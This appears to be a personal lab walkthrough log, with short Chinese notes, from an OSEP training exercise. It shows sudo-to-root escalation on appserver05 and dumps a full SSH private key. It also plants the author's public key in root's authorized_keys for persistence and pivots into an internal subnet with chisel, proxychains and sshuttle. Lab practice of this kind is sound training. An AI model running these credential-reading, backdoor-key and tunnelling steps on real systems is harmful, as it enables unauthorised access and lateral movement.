从172.16.243.184上可以登录到172.16.243.197,注意切换用户到ansiblesvc
root@ansible06:/home/ansiblesvc# **su - ansiblesvc**
ansiblesvc@ansible06:~$ **ssh [email protected]**
Warning: Permanently added the ECDSA host key for IP address '172.16.243.197' to the list of known hosts.
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Tue Oct 27 15:58:24 2020 from 172.16.50.184
ansiblesvc@appserver05:~$ ifconfig
Command 'ifconfig' not found, but can be installed with:
apt install net-tools
Please ask your administrator.
ansiblesvc@appserver05:~$ **ip addr show**
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:86:45:b3 brd ff:ff:ff:ff:ff:ff
inet **172.16.243.197**/24 brd 172.16.243.255 scope global noprefixroute ens160
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe86:45b3/64 scope link
valid_lft forever preferred_lft forever
ansiblesvc@appserver05:~$
ansiblesvc@appserver05:~$ **find / -name local.txt 2>/dev/null**
ansiblesvc@appserver05:~$ **sudo -l**
Matching Defaults entries for ansiblesvc on appserver05:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
**User ansiblesvc may run the following commands on appserver05:
(ALL) NOPASSWD: ALL**
ansiblesvc@appserver05:~$ sudo su
root@appserver05:/home/ansiblesvc# find / -name proof.txt 2>/dev/null
/root/proof.txt
root@appserver05:/home/ansiblesvc# cat /root/proof.txt
f50e80a9fb44bfb4d440631e796f3f56
root@appserver05:/home/ansiblesvc# history
1 echo f50e80a9fb44bfb4d440631e796f3f56 > /root/proof.txt
2 passwd
3 exit
4 find / -name proof.txt 2>/dev/null
5 cat /root/proof.txt
6 history
root@ansible06:/home/ansiblesvc# ./run-nmap.sh -Pn -A -p- 172.16.243.197
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-03 23:03 EDT
Nmap scan report for 172.16.243.197
Host is up (0.00036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 18:e4:25:fa:33:7b:b3:32:d7:96:3e:02:d7:6a:33:e2 (RSA)
| 256 8a:1f:a8:d1:6e:e2:d8:97:bc:81:11:99:00:0a:aa:77 (ECDSA)
|_ 256 5d:80:95:81:b6:03:09:f9:e1:5b:b3:1f:40:1c:1f:55 (ED25519)
MAC Address: 00:50:56:86:45:B3 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 172.16.243.197
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 15.56 seconds
root@ansible06:/home/ansiblesvc# ping dev.final.com
PING dev.final.com (172.16.243.192) 56(84) bytes of data.
^C64 bytes from 172.16.243.192: icmp_seq=1 ttl=128 time=0.305 ms
--- dev.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.305/0.305/0.305/0.000 ms
root@ansible06:/home/ansiblesvc# curl <http://172.16.243.192:8080>
Command 'curl' not found, but can be installed with:
apt install curl
root@ansible06:/home/ansiblesvc# ping dev.final.com
PING dev.final.com (172.16.243.192) 56(84) bytes of data.
64 bytes from 172.16.243.192: icmp_seq=1 ttl=128 time=0.282 ms
64 bytes from 172.16.243.192: icmp_seq=2 ttl=128 time=0.366 ms
64 bytes from 172.16.243.192: icmp_seq=3 ttl=128 time=0.398 ms
64 bytes from 172.16.243.192: icmp_seq=4 ttl=128 time=0.349 ms
^C
--- dev.final.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 12049ms
rtt min/avg/max/mdev = 0.282/0.348/0.398/0.042 ms
root@ansible06:/home/ansiblesvc/.ssh# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
想用上面的私钥来免密登录,发现不行,后续自己生成一对公私钥,然后上传公钥来达到免密登录的目的。
这里有个问题,最开始把chisel放在192.168.243.181上,通过这个地址的socks5代理没法访问172.16.243.197的8080和8081端口。
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 curl <http://172.16.243.197:8081> 7 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:8081 <--socket error or timeout!
curl: (7) Couldn't connect to server
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 curl <http://172.16.243.197:8080> 7 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:8080 <--socket error or timeout!
curl: (7) Couldn't connect to server
本地产生RSA公私钥:
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ ssh-keygen -t rsa 130 ⨯
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/Documents/OSEP/ch6/197/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/Documents/OSEP/ch6/197/id_rsa
Your public key has been saved in /home/kali/Documents/OSEP/ch6/197/id_rsa.pub
The key fingerprint is:
SHA256:TEDct16Iiwa5uRE19ckC+Xq6n7IISs2rS6Y7KAVI6ZY kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| . o++. |
| o =o.o.. |
|+ . o ooo+o |
|oE + oo.o . |
|.. = oSo . |
| + + + o . |
|.=.o + o |
|O. .o.o . |
|==o.. o=o |
+----[SHA256]-----+
root@appserver05:~# mkdir .ssh
~~root@appserver05:~# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBtxBpiJWalGV6ISze8Bue13PcPmpl9rJ6HI3etSXbR6QTzVvitpWbOeOSMK+72rlBiCWVxzDooP0YtCVSNnq+K4Lb7rx5cvhbXEzdzlsxN8AtIhJ0NO/4F2sarG1s69H+XqNUWfb9LcvPczEYosONIj+vxRpmLZLC+Nx98TZprwt7RJto0IM2EpkVNo7LE2REff81SGObYjh1CmIm+OlWQ3Oz+ht4M2a41yRISGgMMNdT6CWe+JrnCvJ/dfuZXtaJxJKDUUNfBR98BjVopzQleyDt00HlvzfIVTpqnEfVIm4e/MkBozULSfQGn+ZYkQKSy/7qIk3zddk556UW7tktueeVtA9yZOLGeIE1leiBP2jQLyMI8+8N8BTb8hSDjVYmFcXjzeopQvDDqLRnNhRBS1WRR6H6nF6qJpma+eAN0NjYE/umhGY7KJHoYj5O2Blc857k/2jmPfV1jRddoenIilIo3UCv027C/1bdAlmSYmWOTxVIGSHy1caBpWRqlrc= kali@kali' >> authorized_keys
root@appserver05:~# chmod 0600 authorized_keys~~
root@appserver05:~# ls -alh
total 40K
drwx------ 5 root root 4.0K Aug 4 03:19 .
drwxr-xr-x 20 root root 4.0K Oct 26 2020 ..
-rw------- 1 root root 563 Aug 4 03:19 authorized_keys
-rw------- 1 root root 68 Nov 2 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwx------ 2 root root 4.0K Apr 23 2020 .cache
drwxr-xr-x 3 root root 4.0K Oct 27 2020 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 33 Nov 2 2020 proof.txt
drwxr-xr-x 2 root root 4.0K Aug 4 03:19 .ssh
root@appserver05:~# **cd .ssh**
**root@appserver05:~/.ssh# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBtxBpiJWalGV6ISze8Bue13PcPmpl9rJ6HI3etSXbR6QTzVvitpWbOeOSMK+72rlBiCWVxzDooP0YtCVSNnq+K4Lb7rx5cvhbXEzdzlsxN8AtIhJ0NO/4F2sarG1s69H+XqNUWfb9LcvPczEYosONIj+vxRpmLZLC+Nx98TZprwt7RJto0IM2EpkVNo7LE2REff81SGObYjh1CmIm+OlWQ3Oz+ht4M2a41yRISGgMMNdT6CWe+JrnCvJ/dfuZXtaJxJKDUUNfBR98BjVopzQleyDt00HlvzfIVTpqnEfVIm4e/MkBozULSfQGn+ZYkQKSy/7qIk3zddk556UW7tktueeVtA9yZOLGeIE1leiBP2jQLyMI8+8N8BTb8hSDjVYmFcXjzeopQvDDqLRnNhRBS1WRR6H6nF6qJpma+eAN0NjYE/umhGY7KJHoYj5O2Blc857k/2jmPfV1jRddoenIilIo3UCv027C/1bdAlmSYmWOTxVIGSHy1caBpWRqlrc= kali@kali' >> authorized_keys
root@appserver05:~/.ssh# chmod 0600 authorized_keys**
root@appserver05:~/.ssh# ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Aug 4 03:19 .
drwx------ 5 root root 4.0K Aug 4 03:19 ..
-rw------- 1 root root 563 Aug 4 03:19 authorized_keys
root@appserver05:~/.ssh#
┌──(kali㉿kali)-[~/Documents/OSEP/ch6/197]
└─$ proxychains4 ssh -i id_rsa [email protected] 130 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:22 ... OK
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@appserver05:~#
sshuttle全局代理:proxychains4 sshuttle -v -e "ssh -i id_rsa" -r [email protected] 172.16.243.0/24
┌──(kali㉿kali)-[~/Documents/OSEP/ch6/197]
└─$ **proxychains4 sshuttle -v -e "ssh -i id_rsa" -r [email protected] 172.16.243.0/24**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall']
[proxychains] DLL init: proxychains-ng 4.16
[local sudo] Password:
fw: Starting firewall with Python version 3.10.5
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on
c : UDP : off (not available with nat method)
c : DNS : off (available)
c : User: off (available)
c : Subnets to forward through remote host (type, IP, cidr mask width, startPort, endPort):
c : (<AddressFamily.AF_INET: 2>, '172.16.243.0', 24, 0, 0)
c : Subnets to exclude from forwarding:
c : (<AddressFamily.AF_INET: 2>, '127.0.0.1', 32, 0, 0)
c : (<AddressFamily.AF_INET6: 10>, '::1', 128, 0, 0)
c : TCP redirector listening on ('::1', 12300, 0, 0).
c : TCP redirector listening on ('127.0.0.1', 12300).
c : Starting client with Python version 3.10.5
c : Connecting to server...
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.197:22 ... OK
s: Running server on remote host with /usr/bin/python3 (version 3.8.5)
s: latency control setting = True
s: auto-nets:False
c : Connected to server.
fw: setting up.
fw: ip6tables -w -t nat -N sshuttle-12300
fw: ip6tables -w -t nat -F sshuttle-12300
fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp
fw: iptables -w -t nat -N sshuttle-12300
fw: iptables -w -t nat -F sshuttle-12300
fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp
fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 172.16.243.0/24 -p tcp --to-ports 12300
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.